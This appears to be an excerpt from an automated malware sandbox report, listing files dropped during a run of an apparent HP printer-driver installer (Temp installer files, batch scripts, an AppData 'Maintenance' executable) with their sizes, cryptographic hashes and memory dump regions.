C:\Users\Admin\AppData\Local\Temp\7zS5CD4\ProductInst.exe

Filesize
1.9MB

MD5
610d520fac468a798d7c880e21dc685d

SHA1
89dbbb3c912ee322acc9104426ab8ee7813fe121

SHA256
22dea2258b3d1dab1f651c00edafe4cff8aa0e927f19445329852644272f38c0

SHA512
e0533ede3e006c821424bf5037e27b54707b718834cd7ad9b0c6fa49c5a9bbd8ee876616bd550db6277f40fdca8d306180304b7f057bf9d369cbafc6d1cffd4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\SUHP1020.VER

Filesize
54B

MD5
7d64d9d1722b73840453ec1af4ace7a7

SHA1
1268e20270be46a00c7d58d3d544323f73a9cc87

SHA256
84b1b5856c6ddc42deeb812ad683e02630e6cb018126e78f1dfc6417d8db6b01

SHA512
b7df864ae558eb1442900a47413b136113090716bd3c502569a07ac832acf0e6cc7465205a131e2961b5335ee5445d107ec43db5f89bcbb36ee5de99b63a4ba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\Setup.exe

Filesize
72KB

MD5
d0026fca561e72951e0aebf41861b80e

SHA1
9d7b900a033a2f3b05e07fff4b6deb2efa26e3d3

SHA256
1849ae504fb59fe23ba25165e583a44222cfb31245e2465c241d148a4090cf77

SHA512
ed9b2b32ce4f99afc6a3b9482361d7745900a5491ecec573bbb6cf6524d5cbe6aa728d4a677091844893625f71579234f430bc921bc0fa9e9df751b0d7dd27e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\drv64.cab

Filesize
1.9MB

MD5
b987429df478930a0e9eea462b9313da

SHA1
6cc9abe698defe4972b414c6c47391a4c9771ec8

SHA256
101b03034b66e37bc5f98e7cc69b3dbfb4cacfbab86f9839a1458d459540d084

SHA512
27672c1827ac4975733ffca3116211edc25c45d36c6c5c2a6556152e145aaab51da10290ef232fd9aedf01418a5023fd33d0a8ed140acde5910ab4e5b358af29

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\hp1018.img

Filesize
125KB

MD5
92ad60ed96583f868736de7bd3c2c157

SHA1
014d5c3c1d3db4fc34e5e177a742c85f1b672b30

SHA256
9d10d8e84a9577f268aac6336ed18cf9235e6f732c1f68e8913c787db60106ce

SHA512
f89bcb8f6bc9ffa78795cf962b790516125d63f3c7f9e9c3edeba9d5c8416202ed7f392b4fc0f2b6c39bf7bd0a1ea74544f11fb0e26b7fd9f8fb17ea1e22784a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\hp1020.img

Filesize
125KB

MD5
4175dd1f8b1deaf28c3079067dda1fbd

SHA1
5646890d7bcb0e0f448f0cd4b7028f8a1aefa4b6

SHA256
375721050ea60de50cd56a2c7b80c34f913c7af336372c93b98ed42d30cb20d9

SHA512
1be33034b59e400e96bd540c6acf119ebdcea49bb427b32ee3b6c911ecc666dd3c1ffe7940fc324c1d6c20276e0864b69bf147d8b6110084c3e813beccde6289

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\hp102032.cat

Filesize
44KB

MD5
c249f42dc693893f1c89f740424ad1c0

SHA1
5b26ebbda71a319bc2120f0661be170931abf0eb

SHA256
575f27645baec48c7bc109ed65b2a6ef5bd21b9937f22778d9bd62185ddbe72a

SHA512
83b54f5948004995802240acdd584ef8b83be261d21c70dd1713209e74d3b5993a91cfc09f2c6950b12ff74e70c0d349f320721e5dc056f157a6c270902dcf64

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\hp102064.cat

Filesize
44KB

MD5
705781244ba198f1cbef9d2800978124

SHA1
b34b9ecdf2855c8e12acf95fbe0c229246795006

SHA256
a0641c7e64fe60e177fb5d69f1d4d2b6455813b61ee645e710087fda0a68f0ce

SHA512
1b2488fd6b4e91495fcd53d58074aee3549165da46dcb11b1fb30d50b0b2202e49997e7d30b5fe4646087ee16eacc52549165d0a49ddc7e2f80c47757dcf9374

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\hp1022.img

Filesize
201KB

MD5
9f235a9a1f82d972787d782336e93b16

SHA1
edeb106a99cedd54572f937eafb15e57c01db10d

SHA256
708a7900dd09f437d642de0649335c7530e72cc901b3c1937eff7a72cacae35a

SHA512
962bbee0e14cf2fd127f918db6c10e096aa570bc35626cc964bf49816f71c1636d638e89b6449c7d80a257748f4738e0c37ca8f3b18e18bf394992325f0fa14d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\hp1022n.img

Filesize
560KB

MD5
2999ff547f0b8d90f7d5c7ea5038af63

SHA1
d81788224acb7195453790ea64593c59772f11a9

SHA256
4b0443460508914e1c0287821e768913a77dca15d38fa82a8da2e36ec7e08ddb

SHA512
0dd4c16a11c0e967f6815b20b69ea2a40cac6c7fdf352895f35d23bc51bd9be217e1e02d1e8bd7084a3141d22e22a75bde31b68b71e394b12e46a96199f5f7d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\license.txt

Filesize
14KB

MD5
54972c3c1c50c5bdd69b34a35e84e1ec

SHA1
4fd61f612369246f1641b29d412e0c35b14521d7

SHA256
4df8ca259fc14160a0ca9aaf2c6278f352bb460f4a04785866ffaa349c6f5f86

SHA512
256a460104d0666c6aa393512766ef6e26115bf55b9b49d731ee4ed483f5ca791c6fcdccf75e27758717e41aede8963c416bcb0f204050267d79be4870d55b46

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\properties.ini

Filesize
931B

MD5
69c38ffdd841de462c820eeeeab1392a

SHA1
d089712cc4b9a3d23495d19a077b46034fdc5f7e

SHA256
d09f837f43190fd197bb5c53866a55bb521b57533017d6482f04ff35734536da

SHA512
2010a257fd80c3badb02ed8dd413783319d11a3d4bfa66482c6417e21a4bbc3cda9794d3f98f4398bbad65fa1497a24a60a16fe42abdf8b465f6b94f09b1a2b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\strings.dll

Filesize
241KB

MD5
7f7f832a2aa662c7841a555f8deac25f

SHA1
7286bd464070c7aaeb8abf620f8c3c720cbf3e9a

SHA256
88248c3abdbe726ae83b341da278379c9a55838447824c90c589f88ec2abdd8c

SHA512
c0987d884267b31baa569aaec21c4d03bd326378a4340dbdf245b87f6d843fb50e4231e9609413c8f0254a9a4f57d3948a4fec0713dc6f8dcc28bdadb429ea11

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19842\Bitmessage_x86_0.6.3.2.exe.manifest

Filesize
1KB

MD5
664f2d313870b7a5221f64843b982ca6

SHA1
0aa6161f154f4c706b735ad94b98fc640eb22c8e

SHA256
cb22d067d3131f5d5285ccf3d32132de5db9ae6d3e7ce07b423810ff608b1f0c

SHA512
6a8faacbad176e435e37424ac84e0f5745cfd93165a0798c3eff8b2b16bc15d759e5cd95975783ed8f93f01a3d38dfedf6718ddcb6f17788297bee3933369894

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19842\python27.dll

Filesize
2.5MB

MD5
fc4fd09975a71eada8f10229237ba2bc

SHA1
d3ffc76d46efd9d96f50c8100e88aeb97ce81691

SHA256
9c6de49f0ba3e97fc1948fa44ca14de6a3919f0b7ee7fc5bf0b728ad5f7e330b

SHA512
1f5cad5329b27156cecba35bd35b6f36584bbbb340017ed6357f80575d3a1bb213dfe0481c62e6e51b28b1bb069be6524528f259c32008029d303e885a8772b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lj3ocjw4.bwj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zb2024104122744534.bat

Filesize
740B

MD5
db605b80200d6237f5942b9384965e11

SHA1
dacdd89eee90fde8909ff6d8c0e5a8850b7d0479

SHA256
0ddbb09f50f7c9225147c48056dfa3750c169f2bf6f6fced4188166df246c06d

SHA512
a123a4ec7c561cb3a5beb146c5a3fb4b79bdc1ec674a33395922e20acbe17b1e7b99eeade08814c8fa5e3b1488905624f032a5cd790dac30ef050f454a7e9b12

Download Submit
C:\Users\Admin\AppData\Local\Temp\zbe2024104122744534.bat

Filesize
302B

MD5
8d37e174364a07cd6c07b50332cba057

SHA1
dca3ed2e79b90440bbdabbf12e7b5e6c21e1aec0

SHA256
f9d853ec1b8ca2458c70177092a4be61dd81fe4c098234bc520afaa855b4ae5f

SHA512
b5d0b8cabbe5a8d888cfceecdcd988ee67e8ba79466ec3320040f6b269eb641b2c8731caebdb4f61748ac7f4dc79a34e49eaed84054f5fda74c4de9ca9a4105f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ze2024104122744534.tmp

Filesize
5.4MB

MD5
029412a4cb859113c220e7fbf4dcd666

SHA1
5e3cb8a1b7f8089c2dd910181edbc95b47011f65

SHA256
5a88cecd8826cc96fd52e58e7a31c6622d94423efc6b00f6dea31363a7146210

SHA512
0ad6e44365b2f23f1e507758c407749bee6a6b16df9a6cebcc110dedb7d335ab9a7eb8a834a366bdd72ae9c4d53e7b3e5da2d5a3fcec8057df71b15d1ed7610e

Download Submit
C:\Users\Admin\AppData\Local\Temp\zx2024104122744534.xml

Filesize
1KB

MD5
9f71f88294489b00ac1772ee1aa8bfd6

SHA1
ac3e5459dc3e3445c69295ce34650831700817bb

SHA256
4ca4336c919690415586b70636e5908fcfad791b0bdddb870166eb08d60249eb

SHA512
f7e49aebb80e793f4bcfd3034c5d035446e96702bf51c4d2e3729af5f012c397448212009f53e8b319ea7baf090a77be58d81cd1322f8e6f10e2469b3ce0e77d

Download Submit
C:\Users\Admin\AppData\Local\Temp\{f6bfe8b4-2f97-bf41-a390-19e1faa9cb9d}\SETDAE4.tmp

Filesize
1.2MB

MD5
7b59aa8b5d13e9ce727348d2bf4e2166

SHA1
1dba73230d81f0dc949ecd3a58c69c36a58c02ac

SHA256
d9cae4fe297755c4f73ca18ae31897fdf8f864f602726559a9068ac473eea70c

SHA512
28fbbbd79ef8bc00db7826f37b030bd08e2c580d33b9080a047d90ae08ddd4426314a5058fd9f7a0df57891c70660a316cffd8dc9a0bc116d51a6e12dbea1827

Download Submit
C:\Users\Admin\AppData\Local\Temp\{f6bfe8b4-2f97-bf41-a390-19e1faa9cb9d}\SETDB15.tmp

Filesize
63KB

MD5
d248abaff17c0e861f4a5499f4dbc10b

SHA1
fcd4102ac5eeb5c8f5e1e35357011ef71b09f2f6

SHA256
1349ffce23f9a829c7a6ae29c85c005637200265424a65d6bf462fb14a157938

SHA512
778bfa31e46cd8e4405f853826aa8e4d1924e98e6eb4712af9c85c51aa21c17cfd2a3f05e910007e81f7ec325effcf72ab5469f78718a292341160c0ce03a628

Download Submit
C:\Users\Admin\AppData\Local\Temp\{f6bfe8b4-2f97-bf41-a390-19e1faa9cb9d}\SETDB27.tmp

Filesize
661KB

MD5
4dad1c987ce86f607e8dff43dd0d0972

SHA1
9ea70c136301663a6a975e4e752461eadd935c0b

SHA256
2fcab4b29f42cd10daae28639ec1ebdbd6a493ed41fca86c62e3c43d5db127a4

SHA512
bbca10b86cdb21527747be512c1aa5e457e7f0c1d9bf01ba07fbf760d000f591bf2315e7bafabd6395ba754461afd237c7a538267e3bfa95faf607b2582a141d

Download Submit
C:\Users\Admin\AppData\Local\Temp\{f6bfe8b4-2f97-bf41-a390-19e1faa9cb9d}\SETDB48.tmp

Filesize
3.0MB

MD5
d7cf99dc7f27c959747536d05f656e40

SHA1
21078f8c9d9f15d57ffcaf6f68c4eedeea8e63f4

SHA256
a4c62910af1f6388dba1d6da381b714d53f746e46c5f211c4c82ee255eb6ca18

SHA512
db39449427872ef2bac247007776d96f2c6d1659f093d6ac3f6cca60e36fc8dc415146410ca5af78747361cee19ccc500dc0386c5a95885f868ecf08ca36ba17

Download Submit
C:\Users\Admin\AppData\Local\Temp\{f6bfe8b4-2f97-bf41-a390-19e1faa9cb9d}\SETDB79.tmp

Filesize
188KB

MD5
5098d96d9e1975dbfe870757b097cc51

SHA1
6b8609ef9e3d6e5a31a67ebd88e7d3db40b5aa56

SHA256
1ef2b4077dbc56d7f90a5c3a560dc008a8a7282eaf60dec4ccaafbc9069bd907

SHA512
573b4b6502fb04e8dbde7648ddfaa5314caa445f6238df68af8f9f9b390674eebe1192d523013e5a013b18d5f4cdd329142e0f888c3fa3f3dc7d9293e036b912

Download Submit
C:\Users\Admin\AppData\Local\Temp\{f6bfe8b4-2f97-bf41-a390-19e1faa9cb9d}\SETDB7B.tmp

Filesize
490KB

MD5
39ae2ebf5481cd8bbad5d2a73627972a

SHA1
8e31e1b50edc882d55f50fb148dd6e3b7e1680f9

SHA256
4a40e46003c9829305be884eddf2535ef38c5cb37382a33b2cb98cdb5235ce7d

SHA512
11d8f473743a51554f3dff6a8bbb9a61ba9ff55793d209aa71384f30ed759299105491af2883963a4c2169c990080f2efd7c52a47bb2f7c896ee7e950e00c8f7

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\apps\m

Filesize
11B

MD5
57cb773ae7a82c8c8aae12fa8f8d7abd

SHA1
5b30e2c5ecb965cd571ebe6fa56b9b1db7e21ae4

SHA256
8589c63b0943a62bfda9b35dccc71a30f5677386f6f7c644c3307465ce2cfa55

SHA512
2b76813958b443598c8dbaba0d8e1048d49549862afd49828871d833ff5266cdded2625bf0147dc2be42f857196d34ec6fe4967e49a60b972c014cff51fc0ca8

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

Filesize
2.2MB

MD5
73ad6d009f1c53c23f5d068caa805299

SHA1
f50493f49c3b2b3697b5eb571738dbc70383cac0

SHA256
a77315296dc58edac4959c9ed69ec96e9517883684edaeba3e64c48a44c186ae

SHA512
1f9c739c7b745ba57b3d7e50e00bac9d3019de25aab5bb22c0da810d963dab93d71c56686fccf737cf87a4c95fe53b8e4b3dda09ac1526fb4899aa0e1336e920

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\mod

Filesize
7KB

MD5
11ae2d342dc0090f7bdc9f58f7f9d663

SHA1
024cb54888f9e08b8e160a3d55b0628ef14fd2e0

SHA256
88e2f3f12b676c4106dd27052bec339b1607c3d74c71c419b9a605a347e4a813

SHA512
db621ca2e94d77550b89171fcef324b18d48042d8d6649dca6e608d611b2a4b7b1cca3872e799b43f0da37f69bf36af9a9819ba3419c46a78a46b9758eeeace5

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc

Filesize
33.8MB

MD5
38b657df43b002bab8fcb08efc0adf49

SHA1
8a4dfbe7ff29921ff9f464ba308e4e1f82698613

SHA256
e714337ac069b06aa5ba66cc37c55ebf6da0546838e96850818474544742fe58

SHA512
79e07ec5c5daff3d6b61024e16423e6225df1f7944296fac0cd3411f2e7f731bbf1461a53602f4472c4880e6ac7837cf295510809441fc3a09625d5094bd9674

Download Submit
C:\Windows\System32\CatRoot2\dberr.txt

Filesize
38KB

MD5
71c6367ce47a0da2f38f5cc0a4cbb146

SHA1
2c5c079566067bfc2624b7a25d59bd510737216b

SHA256
eac13b530c9d4434211ac59b04c541c79577cd6dabd0c56454d174f50f04bd76

SHA512
0511605d815caa6bc8cdaa4e9f727001774cd54d63ba079bbcd9efc027413e82936cbaf3c1b249568378979b331d4432efc69bb6dc02964315c8ca042aa80341

Download Submit
memory/552-2724-0x000000000BA40000-0x000000000BB0C000-memory.dmp

Filesize
816KB

Download
memory/552-2726-0x000000006DFC0000-0x000000006E540000-memory.dmp

Filesize
5.5MB

Download
memory/552-2719-0x00000000048A0000-0x000000000494A000-memory.dmp

Filesize
680KB

Download
memory/552-2718-0x0000000003F60000-0x000000000409C000-memory.dmp

Filesize
1.2MB

Download
memory/552-2722-0x000000000B990000-0x000000000BA34000-memory.dmp

Filesize
656KB

Download
memory/552-2717-0x00000000028B0000-0x00000000028C5000-memory.dmp

Filesize
84KB

Download
memory/552-2721-0x000000000B970000-0x000000000B983000-memory.dmp

Filesize
76KB

Download
memory/552-2720-0x000000000B950000-0x000000000B96A000-memory.dmp

Filesize
104KB

Download
memory/552-2920-0x000000006B000000-0x000000006C64E000-memory.dmp

Filesize
22.3MB

Download
memory/2368-1399-0x0000000005030000-0x0000000005658000-memory.dmp

Filesize
6.2MB

Download
memory/2368-1398-0x00000000023C0000-0x00000000023F6000-memory.dmp

Filesize
216KB

Download
memory/2368-1462-0x0000000006F90000-0x0000000007026000-memory.dmp

Filesize
600KB

Download
memory/2368-3247-0x0000000008B10000-0x000000000903C000-memory.dmp

Filesize
5.2MB

Download
memory/2368-1463-0x0000000006EE0000-0x0000000006F02000-memory.dmp

Filesize
136KB

Download
memory/2368-1450-0x0000000006210000-0x000000000622A000-memory.dmp

Filesize
104KB

Download
memory/2368-1449-0x0000000007610000-0x0000000007C8A000-memory.dmp

Filesize
6.5MB

Download
memory/2368-1436-0x0000000005D50000-0x0000000005D9C000-memory.dmp

Filesize
304KB

Download
memory/2368-1435-0x0000000005CC0000-0x0000000005CDE000-memory.dmp

Filesize
120KB

Download
memory/2368-1423-0x00000000056D0000-0x0000000005A24000-memory.dmp

Filesize
3.3MB

Download
memory/2368-1412-0x0000000004FB0000-0x0000000005016000-memory.dmp

Filesize
408KB

Download
memory/2368-1413-0x0000000005660000-0x00000000056C6000-memory.dmp

Filesize
408KB

Download
memory/2368-1411-0x0000000004E10000-0x0000000004E32000-memory.dmp

Filesize
136KB

Download
memory/2368-1464-0x0000000007C90000-0x0000000008234000-memory.dmp

Filesize
5.6MB

Download
memory/2368-3246-0x0000000008410000-0x00000000085D2000-memory.dmp

Filesize
1.8MB

Download
memory/3300-1384-0x0000000002A70000-0x0000000002A84000-memory.dmp

Filesize
80KB

Download
memory/3300-3033-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3300-3200-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3300-2874-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3300-1628-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3300-3360-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3300-3529-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3300-3685-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3300-3838-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3300-4007-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download